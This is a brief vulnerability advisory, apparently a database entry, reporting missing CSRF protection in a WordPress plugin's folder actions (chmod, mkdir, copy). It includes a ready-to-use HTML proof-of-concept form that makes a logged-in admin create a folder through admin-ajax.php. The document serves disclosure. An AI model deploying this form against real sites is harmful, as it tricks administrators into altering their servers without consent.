The plugin does not have CSRF checks when performing some actions such as chmod, mkdir and copy, which could allow attackers to make a logged-in admin perform them and create arbitrary folders, copy file for example.
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="https://example.com/wp-admin/admin-ajax.php"><table><tr><td>action</td><td><input type="text" value="cuar_folder_action" name="action"></td></tr> <tr><td>folder_action</td><td><input type="text" value="mkdir" name="folder_action"></td></tr> <tr><td>path</td><td><input type="text" value="/var/www/html/wp-content/tmpp" name="path"></td></tr> <tr><td>extra</td><td><input type="text" value="0770" name="extra"></td></tr> </table><input type="submit" value="https://example.com/wp-admin/admin-ajax.php"></form></html>
rezaduty
rezaduty
Yes
2023-01-17 (about 4 months ago)
2023-01-17 (about 4 months ago)
2023-01-18 (about 4 months ago)